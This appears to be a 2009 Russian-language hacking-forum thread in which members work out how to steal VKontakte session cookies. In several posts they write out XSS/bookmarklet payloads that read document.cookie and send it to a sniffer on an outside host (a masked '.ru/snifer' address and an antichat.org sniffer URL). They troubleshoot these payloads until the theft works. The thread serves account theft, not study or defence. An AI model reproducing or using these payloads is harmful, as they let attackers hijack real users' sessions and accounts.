ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS - контакт
  #1  
Старый 18.05.2009, 18:18
FatalLerr0r
Познающий
Регистрация: 15.04.2009
Сообщений: 35
Провел на форуме:
193561

Репутация: 12
Отправить сообщение для FatalLerr0r с помощью ICQ
По умолчанию XSS - контакт

Здравствуйте! Помогие пожалуйсто, вот такая ситуация произошла....я юзаю ачатовский сниффер, но ктото недавно видимо заюзал мой снифф....Но дело не в этом, я вот увидел , что в моем сниффе появились куки от контакта!!! тоесть там было :

Запрос с vkontakte.ru (**.**.****)
QUERY: remixlang=0; __utmz=2010492......ну как пложено в общем
Но проблема в том что в Reffer не показано нечего = (
в реффере вот это :
REFERER: http://vkontakte.ru/id11597***?25*3*

Скажите , что это значит? Вконтакте есть активка о_О ???? Или как можно вапще пощупать эту багу? я заходил на страницу...обычный какойто юзер , нече у него на странице интресного ( скриптов) неувидел(
 
Ответить с цитированием

  #2  
Старый 18.05.2009, 18:21
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

если не ошибаюсь можно зайти вконтакт и потом стереть урл и прописать cниф

Последний раз редактировалось S0ulVortex; 18.05.2009 в 18:24..
 
Ответить с цитированием

  #3  
Старый 18.05.2009, 18:23
FatalLerr0r
Познающий
Регистрация: 15.04.2009
Сообщений: 35
Провел на форуме:
193561

Репутация: 12
Отправить сообщение для FatalLerr0r с помощью ICQ
По умолчанию

ага и нечего непроизойдет ( ток что попробовал)
 
Ответить с цитированием

  #4  
Старый 18.05.2009, 18:26
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

плохо пробовал
 
Ответить с цитированием

  #5  
Старый 18.05.2009, 18:30
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

javascript:var%20s=document.createElement('script' );s.src='http://**.ru/snifer/s.gif?nc='+document.cookie;document.body.appendChi ld(s);void(0);

Как-то так
 
Ответить с цитированием

  #6  
Старый 18.05.2009, 18:31
FatalLerr0r
Познающий
Регистрация: 15.04.2009
Сообщений: 35
Провел на форуме:
193561

Репутация: 12
Отправить сообщение для FatalLerr0r с помощью ICQ
По умолчанию

Цитата:
Сообщение от S0ulVortex  
плохо пробовал
В таком случае обьясни плз новичку , что ты имел ввиду, тоесть я зашел вконтакт, стер укр , вписал туда :
<script>img = new Image();img.src = "http://antichat.org/s/*******.gif?"+document.cookie;</script>

Если просто сниф вставить без КСС то будет ПУСТОЙ реффер !!! а кук небудет!

Где ошибка?
 
Ответить с цитированием

  #7  
Старый 18.05.2009, 18:32
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

Цитата:
Сообщение от FatalLerr0r  
В таком случае обьясни плз новичку , что ты имел ввиду, тоесть я зашел вконтакт, стер укр , вписал туда :
<script>img = new Image();img.src = "http://antichat.org/s/*******.gif?"+document.cookie;</script>

Где ошибка?
Это тебе не сайт а браузер так не прокатит.
 
Ответить с цитированием

  #8  
Старый 18.05.2009, 18:35
FatalLerr0r
Познающий
Регистрация: 15.04.2009
Сообщений: 35
Провел на форуме:
193561

Репутация: 12
Отправить сообщение для FatalLerr0r с помощью ICQ
По умолчанию

Я понял уже...тока чето
javascript:var%20s=document.createElement('script' );s.src='http://**.ru/snifer/s.gif?nc='+document.cookie;document.body.appendChi ld(s);void(0);
непомогает, "0" !
 
Ответить с цитированием

  #9  
Старый 18.05.2009, 18:36
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

Цитата:
Сообщение от FatalLerr0r  
Я понял уже...тока чето
javascript:var%20s=document.createElement('script' );s.src='http://**.ru/snifer/s.gif?nc='+document.cookie;document.body.appendChi ld(s);void(0);
непомогает, "0" !

ПРОБЕЛЫ УБЕРИ
 
Ответить с цитированием

  #10  
Старый 18.05.2009, 18:48
FatalLerr0r
Познающий
Регистрация: 15.04.2009
Сообщений: 35
Провел на форуме:
193561

Репутация: 12
Отправить сообщение для FatalLerr0r с помощью ICQ
По умолчанию

Пипеец я ламо...=// Спс биг S0ulVortex ! Все пашет , кулл, терь я понимаю это дело , спс = )

Последний раз редактировалось FatalLerr0r; 18.05.2009 в 18:50..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
Xss: Cегодня и вчера. Опрос Constantine Болталка 48 07.12.2009 08:57
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Xss Расширенный межсайтовый скриптинг SNIFF Чужие Статьи 0 24.11.2005 08:08
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ